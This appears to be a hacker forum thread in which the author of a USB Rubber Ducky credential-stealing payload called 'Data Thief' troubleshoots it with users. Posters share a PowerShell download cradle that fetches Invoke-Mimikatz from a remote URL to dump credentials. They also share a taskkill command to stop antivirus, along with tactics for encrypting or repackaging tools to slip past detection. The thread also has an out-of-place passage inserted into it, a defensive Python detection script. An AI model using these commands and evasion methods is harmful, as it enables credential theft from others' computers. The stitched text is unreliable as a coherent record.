Allucard Posted November 29, 2013

Hello lavanoid, I'm having a problem with the payload. The SP.bat version 1.6 isn't doing everything it should, like getting the pass dump and the Chrome pass and more, but SP.bat 1.5 is working fine. I have changed the settings inside the SP.bat through all the combinations possible and nothing. I'm running a Win7 64-bit, and I repeat that I run version 1.5 fine. Thanks for the good work.
UnKn0wnBooof (Author) Posted November 29, 2013

> Hello lavanoid, I'm having a problem with the payload. The SP.bat version 1.6 isn't doing everything it should, like getting the pass dump and the Chrome pass and more, but SP.bat 1.5 is working fine. I have changed the settings inside the SP.bat through all the combinations possible and nothing. I'm running a Win7 64-bit, and I repeat that I run version 1.5 fine. Thanks for the good work.

I've just uploaded another update. One of the batch labels in the SP.bat file was misspelt. My keyboard didn't enter the "_" for the 64_bit label. It should be working perfectly now. Comment if you encounter any more issues.
Allucard Posted November 29, 2013

Thanks, and one other thing that I only checked today with the previous version: if I try to do that as an unprivileged user, Windows asks for the password of the admin. Is there any way around it???
UnKn0wnBooof (Author) Posted November 29, 2013

> Thanks, and one other thing that I only checked today with the previous version: if I try to do that as an unprivileged user, Windows asks for the password of the admin. Is there any way around it???

Well, without Administrative access, the only things the payload can really do are get Chrome login data and Windows product keys. The procdump won't work because it requires access to another program's RAM data, which needs admin access. Mimikatz won't work because, once again, it needs access to another program's RAM data, and wifi keys cannot be recovered because of Microsoft's encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine, it won't work. So the answer to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want.
Allucard Posted January 19, 2014

Lavanoid, hello, how are you??? What happened, or better question, why do you no longer have the payload available??? Can I do anything to help???
MB60893 Posted January 19, 2014 (edited)

> Well, without Administrative access, the only things the payload can really do are get Chrome login data and Windows product keys. The procdump won't work because it requires access to another program's RAM data, which needs admin access. Mimikatz won't work because, once again, it needs access to another program's RAM data, and wifi keys cannot be recovered because of Microsoft's encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine, it won't work. So the answer to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want.

You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. The only thing is that Microsoft Security Essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from PowerShell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

Edited January 20, 2014 by MB60893
UnKn0wnBooof (Author) Posted January 20, 2014 (edited)

> Lavanoid, hello, how are you??? What happened, or better question, why do you no longer have the payload available??? Can I do anything to help???

I removed the payload because of reasons that I currently don't want to discuss. All I'm saying is, it's a secret. I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file. I'll re-upload the payload within a week or two. You might be wondering why so long. Well, like I said, a secret.

Edited January 20, 2014 by Lavanoid
mw3demo Posted January 20, 2014

> I removed the payload because of reasons that I currently don't want to discuss. All I'm saying is, it's a secret. I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file. I'll re-upload the payload within a week or two. You might be wondering why so long. Well, like I said, a secret.

Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine-tuning. OSX payload next? :P Keep it up!
UnKn0wnBooof (Author) Posted January 20, 2014

> You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. The only thing is that Microsoft Security Essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from PowerShell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :)

HHHmmmmm. Seems like a good idea to implement Metasploit in the payload. However, I'd need support from a group of people who have different antivirus programs. Then I'd need them to write batch files that can successfully terminate the AV user interface. Then I'd need them to make notes of what service their AV programs run under; this way, once elevation has been granted (through Metasploit), we could just kill the AV services. If you manage to successfully get a script that can be added to the payload which has Metasploit implemented, then that would be great. I don't have much time to tinker with Metasploit, so it would be great if you guys can mess around with it instead. Great idea though :D .
UnKn0wnBooof (Author) Posted January 20, 2014

> Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine-tuning. OSX payload next? :P Keep it up!

Thanks. As for OSX, unfortunately I don't have an OSX system :( otherwise I would have definitely created a payload for Mac systems too. However, I have been looking into how the Mac OS works by Googling a lot. It's a lot like Linux (is it Linux based?). Anyway, if I ever get my hands on an Apple computer (maybe in the next 2/3 years? I'm not someone with much money) I'll let you know.
MB60893 Posted January 20, 2014 (edited)

Hi again Lavanoid,

You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus.

    powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

You do need the administrative rights to run PowerShell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well! Give it a go!

MB60893.

Edited January 20, 2014 by MB60893
UnKn0wnBooof (Author) Posted January 20, 2014

> Hi again Lavanoid, You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" You do need the administrative rights to run PowerShell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well! Give it a go! MB60893.

I used Mimikatz in the previous versions of Data Thief, but it does trigger Microsoft Security Essentials (why pay for antivirus?). I bypassed this issue by storing Mimikatz in an encrypted zip archive; then, when needed, 7-Zip would decrypt the archive and then run Mimikatz. The advantage of this is that since the Duck RW speeds are slow, antivirus cannot scan the Duck because it is in use by 7-Zip and Mimikatz. Some (if not all) people think it's bad that the Duck has slow RW speeds, but I think it gives us the advantage. The advantage of procdump is that it doesn't trigger AV, but it can be slow :/. Another thing is, Mimikatz doesn't work with Windows 8.1 due to the new security enhancements. I don't have Windows 8, but I did try it on a friend's PC. I would have Windows 8 but they have an OEM key (the key you get when you buy a computer) so I can't activate it; I need a genuine Windows key :/. Anyway, back to the main subject. Mimikatz has been implemented in Data Thief already. Thanks anyway though :D . Before I release DT (Data Thief), I recommend installing the Duck 4CAP firmware (you can get it on Ducky Decode). I recommend it because if Windows takes its time installing the drivers (common with netbook computers), you don't have to worry about it exceeding the delay time.
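Two things in the posts above are worth a detection rule on the defender's side: the in-memory PowerShell cradle (IEX plus DownloadString, followed by Invoke-Mimikatz -DumpCreds) quoted in the last two posts, and the earlier suggestion to stop the security product with taskkill. The following Python is an added example, not code from the thread or from the Data Thief project. It classifies constructed process-creation events of the kind a Sysmon Event ID 1 or EDR sensor records; the function names, the placeholder URL and the list of security-product image names beyond msseces.exe are all assumptions.

```python
import re

# Constructed sample process-creation events (not taken from the thread), as
# (image, command_line) pairs. The first two are modelled on the commands
# quoted in the thread; the URL is a placeholder, not the one in the post.
SAMPLE_EVENTS = [
    ("powershell.exe",
     "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/im.ps1'); Invoke-Mimikatz -DumpCreds\""),
    ("taskkill.exe", "Taskkill /f /im msseces.exe /t"),
    ("powershell.exe", "powershell -File C:\\Scripts\\inventory.ps1"),
    ("taskkill.exe", "taskkill /f /im notepad.exe"),
]

# Image names of security-product processes an attacker may try to terminate.
# msseces.exe is the Microsoft Security Essentials UI named in the thread; the
# other entries are assumptions and should be replaced with your own product's names.
SECURITY_PROCESSES = {"msseces.exe", "msmpeng.exe", "avgnt.exe", "avguard.exe"}

# Indicators of an in-memory PowerShell download cradle and of a credential-dump cmdlet.
IEX_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.DownloadString\s*\(", re.IGNORECASE)
CREDDUMP_RE = re.compile(r"Invoke-Mimikatz|-DumpCreds", re.IGNORECASE)
TASKKILL_IMAGE_RE = re.compile(r"/im\s+(\S+)", re.IGNORECASE)


def classify_event(image, cmdline):
    """Return alert tags for one process-creation event; an empty list means no finding."""
    tags = []
    name = image.lower()
    if name == "powershell.exe":
        # Both halves of the cradle (IEX and DownloadString) are required, so a
        # script that merely downloads a file is not flagged on its own.
        if IEX_RE.search(cmdline) and DOWNLOAD_RE.search(cmdline):
            tags.append("powershell_download_cradle")
        if CREDDUMP_RE.search(cmdline):
            tags.append("credential_dump_cmdlet")
    elif name == "taskkill.exe":
        # Only a kill aimed at a known security-product image is interesting.
        m = TASKKILL_IMAGE_RE.search(cmdline)
        if m and m.group(1).lower() in SECURITY_PROCESSES:
            tags.append("security_tool_kill")
    return tags


def scan(events):
    """Map event index -> tags for every event that produced at least one finding."""
    findings = {}
    for idx, (image, cmdline) in enumerate(events):
        tags = classify_event(image, cmdline)
        if tags:
            findings[idx] = tags
    return findings


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][0], tags)
```

Run against the constructed events, the cradle and the taskkill against msseces.exe are the only two flagged; the inventory script and the kill of notepad.exe pass. Command-line matching like this is cheap but brittle (an attacker can rename the cmdlet or split the string), so it belongs alongside Script Block Logging and AMSI-based telemetry rather than in place of them.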
Sabri Posted February 8, 2014

Really, thanks for your work, sir. The payload works fine for me, but it's detected by my AV: Avira Free, which has been put in Real-Time mode. Do you or anyone else know how to circumvent this problem stealthily? Thanks again.
UnKn0wnBooof (Author) Posted February 9, 2014 (edited)

> Really, thanks for your work, sir. The payload works fine for me, but it's detected by my AV: Avira Free, which has been put in Real-Time mode. Do you or anyone else know how to circumvent this problem stealthily? Thanks again.

Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. installation path like "C:\Program Files\Antivirus", service name "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" and/or "AntivirusSVC.exe". A directory listing of your antivirus program's installation path would be cool. You can do this by running cmd.exe, then using this command:

    DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt"

You would obviously have to edit the directory part. Thanks for the bug report :D

Edited February 9, 2014 by Lavanoid
Sabri Posted February 9, 2014

> Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. installation path like "C:\Program Files\Antivirus", service name "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" and/or "AntivirusSVC.exe". A directory listing of your antivirus program's installation path would be cool. You can do this by running cmd.exe, then using this command: DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt" You would obviously have to edit the directory part. Thanks for the bug report :D

There is no backup log because it stops after the indication that Windows Update has started. The file detected is "SCRIPT_EX.exe" as "TR/ATRAPS.Gen". The antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop. The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt Let me know if this is enough!
UnKn0wnBooof (Author) Posted February 10, 2014

> There is no backup log because it stops after the indication that Windows Update has started. The file detected is "SCRIPT_EX.exe" as "TR/ATRAPS.Gen". The antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop. The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt Let me know if this is enough!

HHHmmm. So I guess I'd have to find a different way of executing the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self-elevating batch script. I realized that the Slax Linux installer batch file has the ability to self-elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because it's a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days. Thanks.
Sabri Posted February 10, 2014

> HHHmmm. So I guess I'd have to find a different way of executing the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self-elevating batch script. I realized that the Slax Linux installer batch file has the ability to self-elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because it's a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days. Thanks.

Thanks a lot in advance for your effort and for taking care of my situation.
UnKn0wnBooof (Author) Posted February 10, 2014

> Thanks a lot in advance for your effort and for taking care of my situation.

I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self-elevate, so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe. Just download the update, extract it, remove SCRIPT_EX.exe from the Duck as well as inject.bin; then run Installer.bat to copy the required files. Hope this update works ;)
Sabri Posted February 10, 2014

> I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self-elevate, so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe. Just download the update, extract it, remove SCRIPT_EX.exe from the Duck as well as inject.bin; then run Installer.bat to copy the required files. Hope this update works ;)

Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :(
UnKn0wnBooof (Author) Posted February 11, 2014

> Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :(

I believe I've just fixed the problem. I'll upload the update within the next 12 hours, as I currently don't have the time to do so. I've also edited the NetCat Terminal.bat file so it has more functions than the previous versions :D . Hope this update will solve your problems ;) .
Epoc Posted February 12, 2014

Thanks for all your great work Lavanoid! About your question on the first page, "I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?" I would like to believe in the creation of a fusion of your ducky script and Mr Gray's payload script. In my opinion, it's a great combination if it's possible!
UnKn0wnBooof (Author) Posted February 14, 2014

> Thanks for all your great work Lavanoid! About your question on the first page, "I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?" I would like to believe in the creation of a fusion of your ducky script and Mr Gray's payload script. In my opinion, it's a great combination if it's possible!

Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs into one and then encrypting them, so that when they run, AV won't know what it is.
Epoc Posted February 14, 2014

> Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs into one and then encrypting them, so that when they run, AV won't know what it is.

Thank you very much for the answer! However, I found that most of the applications contained in Mr Gray's package are outdated. For example, the latest version of the PasswordFox app from Nirsoft's site has the ability to detect passwords on a machine running Windows 7 64-bit, unlike the first app in the original package. That's all, and thank you again for this wonderful work!
Sabri Posted February 16, 2014

Thanks a lot Lavanoid, now it works perfectly for me!
UnKn0wnBooof (Author) Posted February 17, 2014

> Thanks a lot Lavanoid, now it works perfectly for me!

That's great to hear :D .